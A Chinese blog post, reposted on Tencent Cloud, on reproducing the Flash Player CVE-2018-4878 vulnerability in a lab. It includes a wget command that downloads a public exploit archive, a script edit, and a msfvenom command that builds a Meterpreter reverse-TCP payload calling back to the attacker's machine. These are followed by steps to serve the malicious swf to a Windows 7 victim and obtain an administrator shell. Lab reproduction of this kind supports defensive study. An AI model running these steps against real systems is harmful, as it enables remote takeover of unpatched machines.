前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Flash CVE-2018-4878漏洞复现

Flash CVE-2018-4878漏洞复现

作者头像
墙角睡大觉
发布2019-09-24 17:36:46
8720
发布2019-09-24 17:36:46
举报

0x01 前言

Adobe公司在去年2018年2月1日发布了一条安全公告:

https://helpx.adobe.com/security/products/flash-player/apsa18-01.html

公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。

0x02 漏洞影响

Flash Player当前最新版本28.0.0.137以及之前的所有版本

0x03 漏洞复现

环境测试:

攻击机:kali

目标靶机:win7x64 +IE8.0+FLASH player28.0.0.137

下载漏洞利用脚本:

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

可以看到漏洞利用的脚本和swf文件:

不过这里我们需要对exp脚本进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。链接是:https://github.com/anbai-inc/CVE-2018-4878

其次,需要修改替换原来的shellcode代码,我们用kali的msf生成shellcode:

kali:192.168.1.197

win7:192.168.1.105

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.197 lport=5678 -f python>shellcode.txt

替换:

将exp脚本放入kali下和index.html同一个目录下,生成恶意的swf文件,注意脚本下生成swf的目录是/opt/CVE-2018-4878,可以自定义修改目录

为了让win7访问恶意文件,我们开启kali的web服务,将swf文件放到www目录下:

在msf下监听:

开始进行监听之后,在win7上用ie打开197的80端口服务:

Shell回显过来了!

管理员权限:

0x04 漏洞修复

升级到最新版本即可

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-01-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x04 漏洞修复
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档